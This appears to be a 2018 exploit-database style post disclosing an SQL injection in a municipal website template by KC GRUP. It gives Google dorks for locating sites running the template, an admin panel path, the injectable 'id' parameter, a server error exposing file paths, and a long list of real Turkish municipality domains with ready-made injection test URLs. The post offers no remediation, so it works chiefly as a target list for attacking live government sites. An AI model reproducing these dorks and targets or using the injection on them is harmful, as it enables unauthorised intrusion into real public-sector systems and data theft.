Design By KC GRUP Official Municipalities of Turkish SQL Inj

#################################################################################################

# Exploit Title : Design By KC GRUP Official Municipalities of Turkish SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 23/11/2018
# Vendor Homepage : kcgrup.com ~ kcgrupsms.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dorks :
intext:''Copyright © 2014-2018 Belediye - Tüm hakları saklıdır. - Design by KC GRUP''
intext:Design by KC GRUP - Belediye Sitesi site:bel.tr inurl:''/haberdetay.php?id=''
intext:Design by KC GRUP'' site:bel.tr
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Admin Panel Login Path :

panel.kcgrupsms.com

#################################################################################################

# SQL Injection Exploit :

/haberdetay.php?id=[SQL Injection]

#################################################################################################

# Example Vulnerable Sites =>

Turkish Government Official Municipality WebSites are vulnerable for this security issue.

85.95.249.117 IP Address is vulnerable.

[+] guce.bel.tr/haberdetay.php?id=86%27

[+] kofcaz.bel.tr/haberdetay.php?id=86%27

[+] solhan.bel.tr/haberdetay.php?id=86%27

[+] tutak.bel.tr/haberdetay.php?id=86%27

[+] adakli.bel.tr/haberdetay.php?id=86%27

[+] meric.bel.tr/haberdetay.php?id=86%27

[+] karssusuz.bel.tr/haberdetay.php?id=86%27

[+] konuklar.bel.tr/haberdetay.php?id=86%27

[+] mazgirt.bel.tr/haberdetay.php?id=86%27

[+] kofcaz.bel.tr/haberdetay.php?id=86%27

[+] karliova.bel.tr/haberdetay.php?id=86%27

[+] saphane.bel.tr/haberdetay.php?id=86%27

[+] adakli.bel.tr/haberdetay.php?id=86%27

[+] kavakli.bel.tr/haberdetay.php?id=86%27

[+] balikoy.bel.tr/haberdetay.php?id=86%27

[+] duzici.bel.tr/haberdetay.php?id=86%27

[+] pazarlar.bel.tr/haberdetay.php?id=86%27

[+] yozgatdogankent.bel.tr/haberdetay.php?id=86%27

[+] corumortakoy.bel.tr/haberdetay.php?id=86%27

[+] cakirhuyuk.bel.tr/haberdetay.php?id=86%27

[+] deredolu.bel.tr/haberdetay.php?id=86%27

[+] gelendost.bel.tr/haberdetay.php?id=86%27

[+] sutculer.bel.tr/haberdetay.php?id=86%27

[+] akharim.bel.tr/haberdetay.php?id=86%27

[+] kazanci.bel.tr/haberdetay.php?id=86%27

[+] cakirhuyuk.bel.tr/haberdetay.php?id=86%27

[+] halfeli.bel.tr/haberdetay.php?id=86%27

[+] kovanlik.bel.tr/haberdetay.php?id=86%27

[+] sultanhani.bel.tr/haberdetay.php?id=86%27

[+] sambayat.bel.tr/haberdetay.php?id=86%27

[+] meric.bel.tr/haberdetay.php?id=86%27

[+] cimitekke.bel.tr/haberdetay.php?id=86%27

[+] uludere.bel.tr/haberdetay.php?id=86%27

[+] demirkoy.bel.tr/haberdetay.php?id=86%27

[+] bereketli.bel.tr/haberdetay.php?id=86%27

[+] uzgorur.bel.tr/haberdetay.php?id=86%27

[+]  akpazar.bel.tr/haberdetay.php?id=86%27

[+] ardanuc.bel.tr/haberdetay.php?id=86%27

[+] guneyyurt.bel.tr/haberdetay.php?id=86%27

[+] olukozu.bel.tr/haberdetay.php?id=86%27

[+] buyukkalecik.bel.tr/haberdetay.php?id=86%27

[+] altinbasak.bel.tr/haberdetay.php?id=86%27

[+] hatipli.bel.tr/haberdetay.php?id=86%27

[+] cakirhuyuk.bel.tr/haberdetay.php?id=86%27

#################################################################################################

# Example SQL Database Error :

Warning: Cannot modify header information - headers already sent by (output started at /home/guce/

public_html/baglan.php:7) in /home/guce/public_html/haberdetay.php on line 101

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################